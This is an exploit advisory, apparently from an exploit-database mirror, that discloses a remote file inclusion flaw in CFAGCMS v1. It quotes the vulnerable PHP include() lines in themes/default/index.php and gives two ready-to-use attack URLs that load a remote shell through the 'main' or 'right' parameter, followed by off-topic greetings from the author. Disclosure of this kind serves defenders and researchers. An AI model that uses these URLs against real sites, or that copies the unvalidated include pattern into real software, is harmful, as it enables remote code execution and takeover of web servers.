id: 4450
date: 12/14/2008
title: CFAGCMS v1 Remote File Inclusion Vulnerabilities
author: BeyazKurt
cves: 

================================================
CFAGCMS v1 Remote File Inclusion Vulnerabilities
================================================


Author : BeyazKurt 

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQIPTAR!
Siyasetle ilgili bisi soliyimmi :p
 
FENERBAHCEE (H)



#  0day.today [2023-03-26]  #